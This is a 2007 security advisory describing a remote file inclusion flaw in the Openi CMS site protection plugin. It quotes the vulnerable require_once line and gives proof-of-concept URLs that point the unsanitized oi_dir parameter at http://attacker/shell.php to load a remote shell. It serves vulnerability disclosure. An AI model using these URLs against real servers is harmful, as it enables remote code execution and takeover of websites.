Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Philboard (id) Remote SQL Injection

KvGuestbook Remote Add Admin Exploit

MediaWiki Full Path Disclosure Vulnerability

phpPolls 1.0.3 (acces to sensitive file)

From:	y3dips <y3dips_(at)_yahoo.com>
Date:	12.02.2007
Subject:	[ECHO_ADV_64$2007] Openi CMS plugins (site protection) remote file inclusion

---------------------------------------------------------------------------------
---
[ECHO_ADV_64$2007] Openi CMS plugins (site protection) remote file inclusion
---------------------------------------------------------------------------------
---

Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : February, 11 2007
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv64-y3dips-2007.txt
Critical Lvl : Critical
---------------------------------------------------------------------------------
---


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Internal range (site protection), version: 1.0
Openi CMS plugins (http://www.openi-cms.org)
URL : http://www.openi-cms.org
Download-path : http://www.openi-cms.org/oi-download.php/45/file_src/oi_plugin_site_protection_1_
0.zip

Description : With this Plugin you can release page ranges only for certain users. The user
must authentifizieren itself with user name and password. Several users for
a page range can be put on. Users and sides which can be protected are put on
in the editorship environment by the administrator.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

Variables "oi_dir" in index.php are not properly sanitized.

---------------index.php --------------------
...
<?PHP
global $config;
require_once($config["oi_dir"]."/base/sitemap_classes.
php");

class plg_site_protection extends Plugin {
...
----------------------------------------------


An attacker can exploit this vulnerability with a simple php injection script.

Poc/Exploit:
~~~~~~~~~~~~

http://target-openi/open-admin/plugins/site_protection/index.
php?config%5boi_dir%5d=http://attacker/shell.php ?

Notes:
~~~~~~

i have to change the variable "oi_dir" to "openi_dir" to get the cms works (config file),
but then u just change the exploit to

http://target-openi/open-admin/plugins/site_protection/index.
php?config%5bopeni_dir%5d=http://attacker/shell.php?

it doesnt matter coz the variable still unsanitized.

---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ my lovely ana
~ k-159 (never stop advising [pushing] me :P), the_day (echo young evil thinker),
~ and all echo staff
~ str0ke, waraxe, negative
~ newbie_hacker@yahoogroups.com
~ #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~~~~

y3dips|| echo|staff || y3dips[at]gmail[dot]com
Homepage: http://y3dips.echo.or.id/